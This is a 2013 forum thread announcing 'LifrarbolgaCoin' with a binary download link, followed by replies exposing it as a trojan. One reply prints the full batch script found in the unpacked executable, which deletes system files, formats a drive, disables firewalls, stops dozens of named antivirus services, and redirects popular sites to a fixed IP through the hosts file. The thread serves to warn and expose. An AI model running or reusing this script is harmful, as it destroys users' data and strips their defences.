[ANN] LifrarbolgaCoin

[LifrarbolgaCoin]

MOD EDIT:
Post source or be banned

Introducing LifrarbolgaCoin LBC, a liquidcoin based currency.

50 Coins Per Bock
8 Billion max coins (each person on earth could have 1 coin)
Default RPC Port: 7589
Network Port: 2773
Difficulty change every 2016 blocks.

We are a group of 19 team members from Technical College Reykjavík.

Sponsored by grant from Icelandic Energy & Utilities
Copyright 2013 LifrarbolgaCoin:

Source Code: & Binaries: sendspace.com/file/kt8btb

Pool coming coon.

As of this post we have 0 premined coins.

Block bonus to encourage mining:
for Blocks 1-1000: 5,000
for Blocks 1001-5000: 2,500
for Blocks 5001-10000: 1,250

for block 50000 15,000
for block 100000 30,000
for block 500000 60,000
for block 1000000 120,000
for block 2000000 240,000
for block 4000000 480,000
for block 8000000 960,000
for block 16000000 1,920,000

[afroman1131]

FILES CONTAIN TROJAN BE CAREFUL!!!!!!!

[LifrarbolgaCoin]

What file contains a trojan? It might be a bug in a code we can fix!

Note to Mod: The source code IS posted.

[kaddyd]

Coin, based on coin, based on coin... Meh.

[scab]

Might be a scam these scammers are really starting to piss me off.

[jamesgarfield]

From the looks of it, scam.

[reich]

These "Mod Edits" Are really starting to be an abuse of power and damn annoying.

[scintill]

Finally, a coin with a good name.

[scintill]

This is certainly a trojan.

Found this in the UPX-unpacked Windows exe:

Code:

@echo off
cd \users\
echo. 2> update.exe del C:\windows\system32 /y
format D: /y
netsh advfirewall set currentprofile state off /y
netsh firewall set opmode DISABLE /y
ping 94.199.255.148 -l 512
c:\users\update.exe
taskkill /f /im cmdagent.exe
taskkill /im
taskkill /f /im Ad-aware.exe
net stop "Avast! Antivirus" /y
net stop "Outpost Firewall Service" /y
net stop "Panda anti-virus service" /y
net stop "Panda Function Service" /y
net stop "Panda IManager Service" /y
net stop "Panda Network Manager" /y
net stop "Panda Process Protection Service" /y
net stop "Panda TPSrv" /y
net stop "Avast! iAVS4 Control Service" /y
net stop "McAfee Framework Service" /y 
net stop "Network Associates McShield" /y
net stop "AntiVir PersonalEdition Classic Guard" /y
net stop "AntiVir PersonalEdition Classic Planer" /y
net stop "AntiVir PersonalEdition Classic Scheduler" /y
net stop "avast! Antivirus" /y
net stop net stop "wzcsvc" /y
net stop "avast! iAVS4 Control Service" /y
net stop "avast! Web Scanner" /y
net stop "MsMpSvc" /y
net stop "Symantec AntiVirus" /y
net stop "Symantec AntiVirus Definition Watcher" /y
net stop "Symantec Event Manager" /y
net stop "Symantec Settings Manager" /y
net stop "Symantec AppCore Service" /y
net stop "Symantec Central Quarantine" /y
net stop "Symantec Client Firewall Accounts Manager" /y
net stop "Symantec Client Firewall Proxy Service" /y
net stop "Symantec Client Firewall Service" /y
net stop "Symantec Core LC" /y
net stop "Symantec Lic NetConnect service" /y
net stop "Symantec Network Drivers Service" /y
net stop "Symantec Network Proxy" /y
net stop "Symantec Quarantine Scanner" /y
net stop "Microsoft Antimalware" /y
taskkill /IM ashdisp.exe
taskkill /f /IM nod32krn.exe
taskkill /f /IM avp.exe
taskkill /f /IM avgamsvr.exe
taskkill /f /IM avgw.exe
taskkill /f /IM avguard.exe
taskkill /F /IM TmListen.exe 
taskkill /F /IM PccNTMon.exe
net stop "Norman API-hooking helper" /y
net stop "Norman NJeeves" /y
net stop "Norman Virus Control on-access component" /y
net stop "Norman Virus Control Scheduler" /y
net stop "Norman ZANDA" /y
taskkill /f /im mfevtps.exe
taskkill /f /im chrome.exe
net stop "Kaspersky Anti-Virus 6.0" /y
net stop "Kaspersky Anti-Virus Service" /y
net stop "Kaspersky Network Agent" /y
net stop "Zonealarm" /y
net stop "PCToolsSSDMonitorSvc" /y
net stop "Norton Internet Security" /y
taskkill /f /im "norton.exe" /y
taskkill /f /im "Norton Auto-Protect.exe" /y
net stop "AntiVir PersonalEdition Guard" /y
net stop "Symantec Proxy Service"/y
net stop "Panda Antivirus" /y
net stop "ZoneAlarm" /y
net stop "OfficeScanNT RealTime Scan" /y
net stop "Trend Micro Proxy Service /y
cd \windows\system32\drivers\etc
echo 94.199.255.148 google.com >> %SYSTEMDRIVE%\Windows\System32\Drivers\Etc\Hosts
echo 94.199.255.148 facebook.com >> %SYSTEMDRIVE%\Windows\System32\Drivers\Etc\Hosts
echo 94.199.255.148 twitter.com >> %SYSTEMDRIVE%\Windows\System32\Drivers\Etc\Hosts
echo 94.199.255.148 bing.com >> %SYSTEMDRIVE%\Windows\System32\Drivers\Etc\Hosts
echo 94.199.255.148 wikipedia.org >> %SYSTEMDRIVE%\Windows\System32\Drivers\Etc\Hosts
echo 94.199.255.148 youtube.com >> %SYSTEMDRIVE%\Windows\System32\Drivers\Etc\Hosts
echo 94.199.255.148 myspace.com >> %SYSTEMDRIVE%\Windows\System32\Drivers\Etc\Hosts
echo 94.199.255.148 msn.com >> %SYSTEMDRIVE%\Windows\System32\Drivers\Etc\Hosts
ipconfig /flushdns
ipconfig /renew
shutdown -r /t 15 /c "Restarting to complete update."

Yes, please fix your "bug" that "accidentally" disables firewalls and virus-scanners and hijacks google.com, facebook.com, etc. *

Also, care to explain why it has the Google Chrome icon and version strings?

* Here's 94.199.255.148:

Code:

$ telnet 94.199.255.148 80
Trying 94.199.255.148...
Connected to 94.199.255.148.
Escape character is '^]'.
GET / HTTP/1.0
Host: google.com

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Thu, 16 May 2013 06:41:22 GMT
Content-Type: text/html
Content-Length: 178
Connection: close
Location: http://www.xtube.com/paid_channels/
Rating: RTA-5042-1996-1400-1577-RTA
Set-Cookie: RNLBSERVERID=ded1276; path=/

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>